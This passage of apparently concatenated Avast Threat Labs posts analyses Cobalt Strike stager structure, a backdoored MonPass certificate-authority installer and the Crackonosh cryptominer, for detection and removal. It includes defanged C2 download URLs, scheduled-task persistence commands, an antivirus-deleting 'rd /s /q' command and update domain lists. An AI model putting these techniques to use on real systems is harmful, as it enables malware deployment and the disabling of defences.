0x00e5 0x56a2b5f0 kernel32.dll_ExitProcess
0x00f2 0x5fc8d902 ws2_32.dll_recv
0x0105 0xe553a458 kernel32.dll_VirtualAlloc
0x0113 0x5fc8d902 ws2_32.dll_recv

Yara rule for TCP Reverse x86 stagers:

TCP Reverse stager x64

Default payload size is 465 bytes plus length of Customer ID if present. Payload has the same position as the SOCKADDR_IN structure such as TCP Bind x64 payload so we can reuse parsing code again.

Default TCP Reverse x64 payload API hashes:

Offset Hash value API name
0x0100 0x0726774c kernel32.dll_LoadLibraryA
0x0111 0x006b8029 ws2_32.dll_WSAStartup
0x012d 0xe0df0fea ws2_32.dll_WSASocketA
0x0142 0x6174a599 ws2_32.dll_connect
0x016b 0x5fc8d902 ws2_32.dll_recv
0x018b 0xe553a458 kernel32.dll_VirtualAlloc
0x01a5 0x5fc8d902 ws2_32.dll_recv
0x01c1 0x614d6e75 ws2_32.dll_closesocket

Yara rule for TCP Reverse x64 stagers:

HTTP stagers x86 and x64

Default x86 payload size fits 780 bytes and the x64 version is 874 bytes long plus size of request address string and size of Customer ID if present. The payloads include full request information stored inside multiple placeholders.

Request address

The request address is a plaintext string terminated by null byte located right after the last payload instruction without any padding. The offset for the x86 version is 0x030C and 0x036A for the x64 payload version. Typical format is IPv4.

Request port

For the x86 version the request port value is hardcoded inside a PUSH instruction as a  dword. The offset for the PUSH instruction is 0x00BE. The port value for the x64 version is stored inside MOV r8d, dword instruction on offset 0x010D.

Request query

The placeholder for the request query has a max size of 80 bytes and the value is a plaintext string terminated by a null byte. If the request query string is shorter, then the rest of the string space is filled with junk bytes. The placeholder offset for the x86 version is 0x0143 and 0x0186 for the x64 version.

Cobalt Strike and other tools such as Metasploit use a trivial checksum8 algorithm for the request query to distinguish between x86 and x64 payload or beacon. 

According to leaked Java web server source code,  Cobalt Strike uses only two checksum values, 0x5C (92) for x86 payloads and 0x5D for x64 versions. There are also implementations of Strict stager variants where the request query string must be 5 characters long (including slash). The request query checksum feature isn’t mandatory.

Python implementation of checksum8 algorithm:

Metasploit server uses similar values:

You can find a complete list of Cobalt Strike’s x86 and x64 strict request queries here.

Request header

The size of the request header placeholder is 304 bytes and the value is also represented as a plaintext string terminated by a null byte. The request header placeholder is located immediately after the Request query placeholder. The offset for the x86 version is 0x0193 and 0x01D6 for the x64 version.

The typical request header value for HTTP/HTTPS stagers is User-Agent. The Cobalt Strike web server has banned user-agents which start with lynx, curl or wget and return a response code 404 if any of these strings are found.

API function HttpOpenRequestA is called with following dwFlags (0x84600200):

Python parsing:

Default HTTP x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00aa 0xa779563a wininet.dll_InternetOpenA
0x00c6 0xc69f8957 wininet.dll_InternetConnectA
0x00de 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x00f2 0x7b18062d wininet.dll_HttpSendRequestA
0x010b 0x5de2c5aa kernel32.dll_GetLastError
0x0114 0x315e2145 user32.dll_GetDesktopWindow
0x0123 0x0be057b7 wininet.dll_InternetErrorDlg
0x02c4 0x56a2b5f0 kernel32.dll_ExitProcess
0x02d8 0xe553a458 kernel32.dll_VirtualAlloc
0x02f3 0xe2899612 wininet.dll_InternetReadFile

Default HTTP x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0120 0xc69f8957 wininet.dll_InternetConnectA
0x013f 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0163 0x7b18062d wininet.dll_HttpSendRequestA
0x0308 0x56a2b5f0 kernel32.dll_ExitProcess
0x0324 0xe553a458 kernel32.dll_VirtualAlloc
0x0342 0xe2899612 wininet.dll_InternetReadFile

Yara rules for HTTP x86 and x64 stagers:

HTTPS stagers x86 and x64

The payload structure and placeholders are almost the same as the HTTP stagers. The differences are only in payload sizes, placeholder offsets, usage of InternetSetOptionA API function (API hash 0x869e4675) and different dwFlags for calling the HttpOpenRequestA API function.

The default x86 payload size fits 817 bytes and the default for the x64 version is 909 bytes long plus size of request address string and size of the Customer ID if present.

Request address

The placeholder offset for the x86 version is 0x0331 and 0x038D for the x64 payload version. The typical format is IPv4.

Request port

The hardcoded request port format is the same as HTTP.  The PUSH offset for the x86 version is 0x00C3. The MOV instruction for x64 version is on offset 0x0110.

Request query

The placeholder for the request query has the same format and length as the HTTP version. The placeholder offset for the x86 version is 0x0168 and 0x01A9 for the x64 version.

Request header

The size and length of the request header placeholder is the same as the HTTP version. Offset for the x86 version is 0x01B8 and 0x01F9 for the x64 version.

API function HttpOpenRequestA is called with following dwFlags (0x84A03200):

InternetSetOptionA API function is called with following parameters:

Python parsing:

Default HTTPS x86 payload API hashes:

Offset Hash value API name
0x009c 0x0726774c kernel32.dll_LoadLibraryA
0x00af 0xa779563a wininet.dll_InternetOpenA
0x00cb 0xc69f8957 wininet.dll_InternetConnectA
0x00e7 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x0100 0x869e4675 wininet.dll_InternetSetOptionA
0x0110 0x7b18062d wininet.dll_HttpSendRequestA
0x0129 0x5de2c5aa kernel32.dll_GetLastError
0x0132 0x315e2145 user32.dll_GetDesktopWindow
0x0141 0x0be057b7 wininet.dll_InternetErrorDlg
0x02e9 0x56a2b5f0 kernel32.dll_ExitProcess
0x02fd 0xe553a458 kernel32.dll_VirtualAlloc
0x0318 0xe2899612 wininet.dll_InternetReadFile

Default HTTPS x64 payload API hashes:

Offset Hash value API name
0x00e9 0x0726774c kernel32.dll_LoadLibraryA
0x0101 0xa779563a wininet.dll_InternetOpenA
0x0123 0xc69f8957 wininet.dll_InternetConnectA
0x0142 0x3b2e55eb wininet.dll_HttpOpenRequestA
0x016c 0x869e4675 wininet.dll_InternetSetOptionA
0x0186 0x7b18062d wininet.dll_HttpSendRequestA
0x032b 0x56a2b5f0 kernel32.dll_ExitProcess
0x0347 0xe553a458 kernel32.dll_VirtualAlloc
0x0365 0xe2899612 wininet.dll_InternetReadFile

Yara rule for HTTPS x86 and x64 stagers:

The next stage or beacon could be easily downloaded via curl or wget tool:

You can find our parser for Raw Payloads and all according yara rules in our IoC repository.

Raw Payloads encoding

Cobalt Strike also includes a payload generator for exporting raw stagers and payload in multiple encoded formats. Encoded formats support UTF-8 and UTF-16le. 

Table of the most common encoding with usage and examples:

Encoding Usage Example
Hex VBS, HTA 4d5a9000..
Hex Array PS1 0x4d, 0x5a, 0x90, 0x00..
Hex Veil PY \x4d\x5a\x90\x00..
Decimal Array VBA -4,-24,-119,0..
Char Array VBS, HTA Chr(-4)&”H”&Chr(-125)..
Base64 PS1 38uqIyMjQ6..
gzip / deflate compression PS1
Xor PS1, Raw payloads, Beacons

Decoding most of the formats are pretty straightforward, but there are few things to consider. 

  • Values inside Decimal and Char Array are splitted via “new lines” represented by “\s_\n” (\x20\x5F\x0A). 
  • Common compression algorithms used inside PowerShell scripts are GzipStream and raw DeflateStream.

Python decompress implementation:

XOR encoding

The XOR algorithm is used in three different cases. The first case is one byte XOR inside PS1 scripts, default value is 35 (0x23).

The second usage is XOR with dword key for encoding raw payloads or beacons inside PE stagers binaries. Specific header for xored data is 16 bytes long and includes start offset, xored data size, XOR key and four 0x61 junk/padding bytes.

Python header parsing:

We can create Yara rule based on XOR key from header and first dword of encoded data to verify supposed values there:

The third case is XOR encoding with a rolling dword key, used only for decoding downloaded beacons. The encoded data blob is located right after the XOR algorithm code without any padding. The encoded data starts with an initial XOR key (dword) and the data size (dword xored with init key).

There are x86 and x64 implementations of the XOR algorithm. Cobalt Strike resource includes xor.bin and xor64.bin files with precompiled XOR algorithm code. 

Default lengths of compiled x86 code are 52 and 56 bytes (depending on used registers) plus the length of the junk bytes. The x86 implementation allows using different register sets, so the xor.bin file includes more than 800 different precompiled code variants.

Yara rule for covering all x86 variants with XOR verification:

The precompiled x64 code is 63 bytes long with no junk bytes. There is also only one precompiled code variant.

Yara rule for x64 variant with XOR verification:

You can find our Raw Payload decoder and extractor for the most common encodings here. It uses a parser from the previous chapter and it could save your time and manual work. We also provide an IDAPython script for easy raw payload analysis.

Conclusion

As we see more and more abuse of Cobalt Strike by threat actors, understanding how to decode its use is important for malware analysis.

In this blog, we’ve focused on understanding how threat actors use Cobalt Strike payloads and how you can analyze them.

The next part of this series will be dedicated to Cobalt Strike beacons and parsing its configuration structure.

The post Decoding Cobalt Strike: Understanding Payloads appeared first on Avast Threat Labs.

Backdoored Client from Mongolian CA MonPass

Introduction

We discovered an installer downloaded from the official website of MonPass, a major certification authority (CA) in Mongolia in East Asia that was backdoored with Cobalt Strike binaries. We immediately notified MonPass on 22 April 2021 of our findings and encouraged them to address their compromised server and notify those who downloaded the backdoored client.

We have confirmed with MonPass that they have taken steps to address these issues and are now presenting our analysis.

Our analysis beginning in April 2021 indicates that a public web server hosted by MonPass was breached potentially eight separate times: we found eight different webshells and backdoors on this server. We also found that the MonPass client available for download from 8 February 2021 until 3 March 2021 was backdoored. 

This research provides analysis of relevant backdoored installers and other samples that we found occurring in the wild. Also during our investigation we observed relevant research from NTT Ltd so some technical details or IoCs may overlap.

All the samples are highly similar and share the same pdb path:

C:\Users\test\Desktop\fishmaster\x64\Release\fishmaster.pdb and the string: Bidenhappyhappyhappy.

Figure 1: Pdb path and specific string

Technical details

The malicious installer is an unsigned PE file. It starts by downloading the legitimate version of the installer from the MonPass official website. This legitimate version is dropped to the C:\Users\Public\ folder and executed under a new process. This guarantees that the installer behaves as expected, meaning that a regular user is unlikely to notice anything suspicious.

Additional similar installers were also found in the wild, with SHA256 hashes:  e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535 and f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8.

Figure 2: This image is not as innocent as it may seem.

The attackers decided to use steganography to transfer shellcode to their victims. On execution, the malware downloads a bitmap image file from http://download.google-images[.]ml:8880/download/37.bmp as shown in figure 2

The download is performed slightly unusually in two HTTP requests. The first request uses the HEAD method to retrieve the Content-Length, followed by a second GET request to actually download the image. After the picture is downloaded, the malware extracts the encrypted payload as follows. The hidden data is expected to be up to 0x76C bytes. Starting with the 3rd byte in image data it copies each 4th byte. The resulting data represents an ASCII string of hexadecimal characters which is later decoded into their respective binary values. These bytes are then XOR decrypted using the hardcoded key miat_mg, resulting in a Cobalt-Strike beacon.

We have seen multiple versions of this backdoored installer, each with slightly modified decryptors. 

In version (f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8) the XOR decryption was stripped.

In the version (e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535) basic anti-analysis tricks were stripped. In Figure 3, you can see different time stamps and the same rich headers.

Figure 3: Timestamps
Figure 4: Rich header.

In the backdoored installer we also observed some basic anti-analysis techniques used in an attempt to avoid detection. In particular, we observed checks for the number of processors using the GetSystemInfo function, the amount of physical memory using the GlobalMemoryStatusEx function and the disk capacity using the IOCTL_DISK_GET_DRIVE_GEOMETRY IOCTL call. If any of the obtained values are suspiciously low, the malware terminates immediately.

Figure 5: Anti-analysis techniques employed by the malware

Figure 6: Anti-analysis technique testing for disk capacity

One of the samples (9834945A07CF20A0BE1D70A8F7C2AA8A90E625FA86E744E539B5FE3676EF14A9) used a different known technique to execute shellcode. First it is decoded from a list of UUIDs with UuidFromStringA API, then it is executed using EnumSystemLanguageGroupsA.

Figure 7:Decoding list from UUIDs and executing shellcode.

After we found a backdoored installer in one of our customers,  we commenced hunting for additional samples in VT and in our user-base, to determine if there were more backdoored installers observed in the wild. In VT we found some interesting hits:

Figure 8: VT hit

We analyzed the sample and found out that the sample was very similar to infected installers found in our customers. The sample contained anti-analysis techniques using the same XOR decryption and also contained similar C2 server addresses (hxxp://download.google-images.ml:8880/download/x37.bmp) as observed in previous backdoored installers. The sample also contained references to the link (hxxps://webplus-cn-hongkong-s-5faf81e0d937f14c9ddbe5a0.oss-cn-hongkong.aliyuncs[.]com/Silverlight_ins.exe) and the file path C:\users\public\Silverlight_ins.exe; however these did not appear to be in use. The sample name is also unusual –  Browser_plugin (8).exe – we speculate that this may be a test sample uploaded by the actor. 

In VT we saw another hash (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910) again with the name Browser_plugin.exe. According to VT this sample has been downloaded from hxxps://jquery-code.ml/Download/Browser_Plugin.exe. It was downloading a PDF from hxxp://37.61.205.212:8880/dow/Aili.pdf PDF file Aili.pdf.

Figure 9: Content of Aili.pdf.

Afterwards it has the similar functionalities as previously mentioned samples from VT. That means it was downloading and decrypting Cobalt strike beacon from hxxp://micsoftin.us:2086/dow/83.bmp

In our database we again found the similar sample but with the name Browser_plugin (1).exe. This sample was downloaded from hxxp://37.61.205.212:8880/download/Browers_plugin.exe, we saw it on Feb 4, 2021. It doesn’t install any legitimate software, it just shows a MessageBox. It contains C&C address (hxxp://download.google-images.ml:8880/downloa/37.bmp), (Note: there is a typo in the directory name: downloa). 

Compromised Web server content

On the breached web server, where you were able to download backdoored installer we found two executables DNS.exe (456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2) and again Browser_plugin.exe (5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe). 

DNS.exe

It downloads from (hxxp://download.google-images.ml:8880/download/DNSs.bat) C&C server bat file, that is saved in C:\users\public\DNS.bat. It contains this script:

Figure 10: DNS.bat script

In the second part of the instance, it contains the similar functionality and the same address of C&C server as the backdoored installer that we mentioned earlier. 

Browser_plugin.exe

(5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe)

This sample is very similar to this one (4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910) with the same address of C&C server, but it doesn’t download any additional document. 

C&C server analysis

We checked the malicious web server hxxps://jquery-code.ml, from where (4A43FA8A3305C2A17F6A383FB68F02515F589BA112C6E95F570CE421CC690910) Browser_plugin.exe has been downloading. The malicious web server looks identical to the legitimate one https://code.jquery.com/ the difference is the certificate. The legitimate server https://code.jquery.com is signed by Sectigo Limited while the malicious server is signed by Cloudflare, Inc.

Figure 11: Comparing two sites

Conclusion

This blog post outlines our findings regarding the MonPass client backdoored with Cobalt Strike. 

In our research we found additional variants on VirusTotal in addition to those we found on the compromised MonPass web server. 

In our analysis of the compromised client and variants, we’ve shown that the malware was using steganography to decrypt Cobalt Strike beacon. 

At this time, we’re not able to make attribution of these attacks with an appropriate level of confidence. However it’s clear that the attackers clearly intended to spread malware to users in Mongolia by compromising a trustworthy source, which in this case is a CA in Mongolia.

Most importantly, anyone that has downloaded the MonPass client between 8 February 2021 until 3 March 2021 should take steps to look for and remove the client and the backdoor it installed. 

I would like to thank Jan Rubín for helping me with this research.

Timeline of communication:

  • March 24. 2021 – Discovered backdoored installer
  • April 8. 2021 – Initial contact with Monpass through MN CERT/CC providing findings.
  • April 20. 2021 – MonPass shared a forensic image of an infected web server with Avast Threat Labs.
  • April 22. 2021 – Avast provided information about the incident and findings from the forensics image in a call with MonPass and MN CERT/CC.
  • May 3. 2021 – Avast followed up with MonPass in email. No response.
  • May 10. 2021 – Avast sent additional follow up email.
  • June 4, 2021 – MonPass replied asking for information already provided on April 22, 2021.
  • June 14. 2021 – Follow up from Avast to MonPass, no response
  • June 29, 2021 – Final email to MonPass indicating our plans to publish with a draft of the blog for feedback.
  • June 29, 2021 – Information from MonPass indicating they’ve resolved the issues and notified affected customers.
  • July 1, 2021 – Blog published.

Indicators of Compromise (IoC)

Timeline of compilation timestamps:

date & time (UTC) SHA256
Feb  3, 2021 07:17:14 28e050d086e7d055764213ab95104a0e7319732c041f947207229ec7dfcd72c8
Feb 26, 2021 07:16:23 f21a9c69bfca6f0633ba1e669e5cf86bd8fc55b2529cd9b064ff9e2e129525e8
Mar  1, 2021 07:56:04 e2596f015378234d9308549f08bcdca8eadbf69e488355cddc9c2425f77b7535
Mar  4, 2021 02:22:53 456b69628caa3edf828f4ba987223812cbe5bbf91e6bbf167e21bef25de7c9d2
Mar 12, 2021 06:25:25 a7e9e2bec3ad283a9a0b130034e822c8b6dfd26dda855f883a3a4ff785514f97
Mar 16, 2021 02:25:40 5cebdb91c7fc3abac1248deea6ed6b87fde621d0d407923de7e1365ce13d6dbe
Mar 18, 2021 06:43:24 379d5eef082825d71f199ab8b9b6107c764b7d77cf04c2af1adee67b356b5c7a
Mar 26, 2021 08:17:29 9834945a07cf20a0be1d70a8f7c2aa8a90e625fa86e744e539b5fe3676ef14a9
Apr 6, 2021 03:11:40 4a43fa8a3305c2a17f6a383fb68f02515f589ba112c6e95f570ce421cc690910


The post Backdoored Client from Mongolian CA MonPass appeared first on Avast Threat Labs.

Crackonosh: A New Malware Distributed in Cracked Software

24 June 2021 at 09:39

We recently became aware of customer reports advising that Avast antivirus was missing from their systems – like the following example from Reddit.

From Reddit

We looked into this report and others like it and have found a new malware we’re calling “Crackonosh” in part because of some possible indications that the malware author may be Czech. Crackonosh is distributed along with illegal, cracked copies of popular software and searches for and disables many popular antivirus programs as part of its anti-detection and anti-forensics tactics.

In this posting we analyze Crackonosh. We look first at how Crackonosh is installed. In our analysis we found that it drops three key files winrmsrv.exe, winscomrssrv.dll and winlogui.exe which we analyze below. We also include information on the steps it takes to disable Windows Defender and Windows Update as well as anti-detection and anti-forensics actions. We include information on how to remove Crackonosh. Finally, we include indicators of compromise for Crackonosh.

Number of hits since December 2020. In total over 222,000 unique devices.
Number of users infected by Crackonosh since December 2020. In May it is still about a thousand hits every day.

The main target of Crackonosh was the installation of the coinminer XMRig, from all the wallets we found, there was one where we were able to find statistics. The pool sites showed payments of 9000 XMR in total, that is with today prices over $2,000,000 USD.

Statistics from xmrpool.eu
Statistics from MoneroHash

Installation of Crackonosh

The diagram below depicts the entire Crackonosh installation process.

Diagram of installation
  1. First, the victim runs the installer for the cracked software.
  2. The installer runs maintenance.vbs
  3. Maintenance.vbs then starts the installation using serviceinstaller.msi
  4. Serviceinstaller.msi registers and runs serviceinstaller.exe, the main malware executable.
  5. Serviceintaller.exe drops StartupCheckLibrary.DLL.
  6. StartupCheckLibrary.DLL downloads and runs wksprtcli.dll.
  7. Wksprtcli.dll extracts newer winlogui.exe and drops winscomrssrv.dll and winrmsrv.exe which it contains, decrypts and places in the folder.

From the original compilation date of Crackonosh we identified 30 different versions of serviceinstaller.exe, the main malware executable, from 31.1.2018 up to 23.11.2020. It is easy to find out that serviceinstaller.exe is started from a registry key created by Maintenance.vbs

The only clue to what happened before the Maintenance.vbs creates this registry key and how the files appear on the computer of the victim is the removal of InstallWinSAT task in maintenance.vbs. Hunting led us to uncover uninstallation logs containing Crackonosh unpacking details when installed with cracked software.

The following strings were found in uninstallation logs:

  • {sys}\7z.exe
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg3.scs" -o{sys}
  • -ir!*.*? e -pflk45DFTBplsd -y "{app}\base_cfg4.scs" -o{localappdata}\Programs\Common
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Maintenance\InstallWinSAT" /TR Maintenance.vbs /RL HIGHEST /F
  • /Create /SC ONLOGON /TN "Microsoft\Windows\Application Experience\StartupCheckLibrary" /TR StartupCheck.vbs /RL HIGHEST /F

This shows us that Crackonosh was packed in a password protected archive and unpacked in the process of installation. Here are infected installers we found:

Name of infected installer SHA256
NBA 2K19 E497EE189E16CAEF7C881C1C311D994AE75695C5087D09051BE59B0F0051A6CF
Grand Theft Auto V 65F39206FE7B706DED5D7A2DB74E900D4FAE539421C3167233139B5B5E125B8A
Far Cry 5 4B01A9C1C7F0AF74AA1DA11F8BB3FC8ECC3719C2C6F4AD820B31108923AC7B71
The Sims 4 Seasons 7F836B445D979870172FA108A47BA953B0C02D2076CAC22A5953EB05A683EDD4
Euro Truck Simulator 2 93A3B50069C463B1158A9BB3A8E3EDF9767E8F412C1140903B9FE674D81E32F0
The Sims 4 9EC3DE9BB9462821B5D034D43A9A5DE0715FF741E0C171ADFD7697134B936FA3
Jurassic World Evolution D8C092DE1BF9B355E9799105B146BAAB8C77C4449EAD2BDC4A5875769BB3FB8A
Fallout 4 GOTY 6A3C8A3CA0376E295A2A9005DFBA0EB55D37D5B7BF8FCF108F4FFF7778F47584
Call of Cthulhu D7A9BF98ACA2913699B234219FF8FDAA0F635E5DD3754B23D03D5C3441D94BFB
Pro Evolution Soccer 2018 8C52E5CC07710BF7F8B51B075D9F25CD2ECE58FD11D2944C6AB9BF62B7FBFA05
We Happy Few C6817D6AFECDB89485887C0EE2B7AC84E4180323284E53994EF70B89C77768E1
Infected installers

The installer Inno Setup executes the following script. If it finds it’s “safe” to run malware, then installs the Crackonosh malware to %SystemRoot%\system32\ and one configuration file to %localappdata%\Programs\Common and creates in the Windows Task scheduler the tasks InstallWinSAT to start maintenance.vbs and StartupCheckLibrary to start StartupcheckLibrary.vbs. Otherwise it does nothing at all.

Reconstructed Crackonosh Inno Setup installer script

Installation script

Analysis of Maintenance.vbs

As noted before, the Crackonosh installer registerers the maintenance.vbs script with the Windows Task Manager and sets it to run on system startup. The Maintenance.vbs creates a counter, that counts system startups until it reaches the 7th or 10th system start, depending on the version. After that the Maintenance.vbs runs serviceinstaller.msi, disables hibernation mode on the infected system and sets the system to boot to safe mode on the next restart. To cover its tracks it also deletes serviceinstaller.msi and maintenance.vbs.

Below is the maintenance.vbs script:

Maintenance.vbs

Serviceinstaller.msi does not manipulate any files on the system, it only modifies the registry to register serviceinstaller.exe, the main malware executable, as a service and allows it to run in safe mode. Below you can see the registry entries serviceinstaller.msi makes.

MSI Viewer screenshot of serviceinstaller.msi

Using Safe Mode to Disable Windows Defender and Antivirus

While the Windows system is in safe mode antivirus software doesn’t work. This can enable the malicious Serviceinstaller.exe to easily disable and delete Windows Defender. It also uses WQL to query all antivirus software installed SELECT * FROM AntiVirusProduct. If it finds any of the following antivirus products it deletes them with rd <AV directory> /s /q command where <AV directory> is the default directory name the specific antivirus product uses. 

  • Adaware
  • Bitdefender
  • Escan
  • F-secure
  • Kaspersky
  • Mcafee (scanner only)
  • Norton
  • Panda

It has names of folders, where they are installed and finally it deletes %PUBLIC%\Desktop\.

Older versions of serviceinstaller.exe used pathToSignedProductExe to obtain the containing folder. This folder was then deleted. This way Crackonosh could delete older versions of Avast or current versions with Self-Defense turned off.

It also drops StartupCheckLibrary.dll and winlogui.exe to %SystemRoot%\system32\ folder.

In older versions of serviceinstaller.exe it drops windfn.exe which is responsible for dropping and executing winlogui.exe. Winlogui.exe contains coinminer XMRig and in newer versions the serviceinstaller drops winlogui and creates the following registry entry:

This connects the infected PC to the mining pool on every start.

Disabling Windows Defender and Windows Update

It deletes following registry entries to stop Windows Defender and turn off automatic updates.

commands executed by serviceinstaller.exe

In the place of Windows Defender it installs its own MSASCuiL.exe which puts the icon of Windows Security to the system tray. 

It has the right icon
Deleted Defender

Searching for Configuration Files 

Looking at winrmsrv.exe (aaf2770f78a3d3ec237ca14e0cb20f4a05273ead04169342ddb989431c537e83) behavior showed something interesting in its API calls. There were over a thousand calls of FindFirstFileExW and FindNextFileExW. We looked at what file it was looking for, unfortunately the author of malware hid the name of the file behind an SHA256 hash as shown below.

In this image, you see the function searching for a file by hash of file name from winrmsrv.exe. Some nodes are grouped for better readability.

This technique was used in other parts of Crackonosh, sometimes with SHA1. 

Here is a list of searched hashes and corresponding names and paths. In the case of UserAccountControlSettingsDevice.dat the search is also done recursively in all subfolders. 

  • in CSIDL_SYSTEM
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450
      • SHA1: F3764EC8078B4524428A8FC8119946F8E8D99A27
      • SHA256: 86CC68FBF440D4C61EEC18B08E817BB2C0C52B307E673AE3FFB91ED6E129B273
    • File 7B296FC0-376B-497d-B013-58F4D9633A22-5P-1.B5841A4C-A289-439d-8115-50AB69CD450B
      • SHA1: 1063489F4BDD043F72F1BED6FA03086AD1D1DE20
      • SHA256: 1A57A37EB4CD23813A25C131F3C6872ED175ABB6F1525F2FE15CFF4C077D5DF7
  • Searched in CSIDL_Profile and actual location is %localappdata%\Programs\Common
    • File UserAccountControlSettingsDevice.dat
      • SHA1: B53B0887B5FD97E3247D7D88D4369BFC449585C5
      • SHA256: 7BB5328FB53B5CD59046580C3756F736688CD298FE8846169F3C75F3526D3DA5

These files contain configuration information encrypted with xor cipher with the keys in executables. 

After decryption we found names of other parts of malware, some URLs, RSA public keys, communication keys for winrmsrv.exe and commands for XMRig. RSA keys are 8192 and 8912 bits long. These keys are used to verify every file downloaded by Crackonosh (via StartupCheckLibrary.dll, winrmsrv.exe, winscomrssrv.dll).

Here we found the first remark of wksprtcli.dll.

StartupCheckLibrary.dll and Download of wksprtcli.dll

StartupCheckLibrary.dll is the way how the author of Crackonosh can download updates of Crackonosh on infected machines. Startupchecklibrary.dll queries TXT DNS records for domains first[.]universalwebsolutions[.]info and second[.]universalwebsolutions[.]info (or other TLDs like getnewupdatesdownload[.]net and webpublicservices[.]org). There are TXT DNS records like [email protected]@@FEpHw7Hn33. From the first twelve letters it computes the IP address as shown on image. Next five characters are the digits of the port encrypted by adding 16. This gives us a socket, where to download wksprtcli.dll. The last eight characters are the version. Downloaded data is validated against one of the Public keys stored in the config file.

Decryption of IP address, screenshot from Ida

Wksprtcli.dll (exports DllGetClassObjectMain) is updating older versions of Crackonosh. The oldest version of wksprtcli.dll that we found checks only the nonexistence of winlogui.exe. Then it deletes diskdriver.exe (previous coinminer) and autostart registry entry. The newest version has a time frame when it runs. It deletes older versions of winlogui.exe or diskdriver.exe and drops new version of winlogui.exe. It drops new config files and installs winrmsrv.exe and winscomrssrv.dll. It also changed the way of starting winlogui.exe from registry HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run to a task scheduled on user login.

Tasks created in Windows task scheduler by wksprtcli.dll

In the end it disallows hibernation and Windows Defender. 

Wksprtcli.dll also checks computer time. The reason may be not to overwrite newer versions and to make dynamic analysis harder. It also has written date after which it to stop winlogui task to be able to replace files.

File
(time of compilation)
Timestamp 1
(after this it kills winlogui task, so it can update it)
Timestamp 2
(before this it runs)
5C8B… (2020-11-20) 2019-12-01 2023-12-30
D9EE… (2019-11-24) 2019-12-01 2020-12-06
194A… (2019-11-24) 2019-03-09
FA87… (2019-03-22) Uses winlogui size instead 2019-11-02
C234… (2019-02-24) 2019-03-09 2019-11-02
A2D0… (2018-12-27)
D3DD… (2018-10-13)
Hardcoded timestamps, full file hashes are in IoCs

Analysis of Winrmsrv.exe

Winrmsrv.exe is responsible for P2P connection of infected machines. It exchanges version info and it is able to download newer versions of Crackonosh. We didn’t find any evidence of versions higher than 0 and therefore we don’t know what files are transferred.

Winrmsrv.exe searches for internet connection. If it succeeds it derives three different ports in the following ways.

First, in the config file, there is offset (49863) and range (33575) defined. For every port there is computed SHA-256 from date (days from Unix Epoch time) and 10 B from config file. Every port is then set as offset plus the first word of SHA moduled by range (offset + (2 B of SHA % range)).

First two ports are used for incoming TCP connections. The last one is used to listen to an incoming UDP. 

Obtain ports, screenshot from IDA

Next, winrmsrv.exe starts sending UDP packets containing version and timestamp to random IP addresses to the third port (approximately 10 IP’s per second). Packet is prolonged with random bytes (to random length) and encrypted with a Vigenère cipher. 

UDP packet

Finally, if winrmsrv.exe finds an IP address infected with Crackonosh, it stores the IP, control version and starts updating the older one with the newer one. The update data is signed with the private key. On the next start winrmsrv.exe connects all stored IP’s to check the version before trying new ones. It blocks all IP addresses after the communication. It blocks them for 4 hours unless they didn’t follow the protocol, then the block is permanent (until restart).

We have modified masscan to check this protocol. It showed about 370 infected IP addresses over the internet (IPv4).

A UDP Hello B
Sends UDP Packet from random port to port 3 -> decrypt, check timestamp (in last 15 s) and if the version match ban IP address for next 4 hr
decrypt, check timestampsame version: do nothingB has lower version: TCP send B has higher version: TCP receive <- Sends UDP Crackonosh Hello Packet to port of A
A TCP Send B
Connect to port 2 -> Search if the communication from A is expected (Successful UDP Hello in last 5 seconds with different versions)
send encrypted packet -> decode data, validate, save
A TCP Receive B
Connect to port 1 -> Search if the communication from A is expected (Successful UDP Hello in last 5 seconds with different versions)
decode data, validate, save <- send encrypted packet
Communication diagram
Encryption scheme of the UDP Packet
Encryption scheme of the TCP Packet

It’s notable that here is a mistake in TCP encryption/decryption implementation shown above. Instead of the red arrow there is computed one more SHA256, that should be used in the xor with the initialization vector. But then there is the source of the SHA used instead of the result.

Analysis of winscomrssrv.dll

It is preparation for the next phase. It uses the TXT DNS records the same way as StratupCheckLibrary.dll. It tries to decode txt records on URL’s:

  • fgh[.]roboticseldomfutures[.]info
  • anter[.]roboticseldomfutures[.]info
  • any[.]tshirtcheapbusiness[.]net
  • lef[.]loadtubevideos[.]com
  • levi[.]loadtubevideos[.]com
  • gof[.]planetgoodimages[.]info
  • dus[.]bridgetowncityphotos[.]org
  • ofl[.]bridgetowncityphotos[.]org
  • duo[.]motortestingpublic[.]com
  • asw[.]animegogofilms[.]info
  • wc[.]animegogofilms[.]info
  • enu[.]andromediacenter[.]net
  • dnn[.]duckduckanimesdownload[.]net
  • vfog[.]duckduckanimesdownload[.]net
  • sto[.]genomdevelsites[.]org
  • sc[.]stocktradingservices[.]org
  • ali[.]stocktradingservices[.]org
  • fgo[.]darestopedunno[.]com
  • dvd[.]computerpartservices[.]info
  • efco[.]computerpartservices[.]info
  • plo[.]antropoledia[.]info
  • lp[.]junglewearshirts[.]net
  • um[.]junglewearshirts[.]net
  • fri[.]rainbowobservehome[.]net
  • internal[.]videoservicesxvid[.]com
  • daci[.]videoservicesxvid[.]com
  • dow[.]moonexploringfromhome[.]info
  • net[.]todayaniversarygifts[.]info
  • sego[.]todayaniversarygifts[.]info
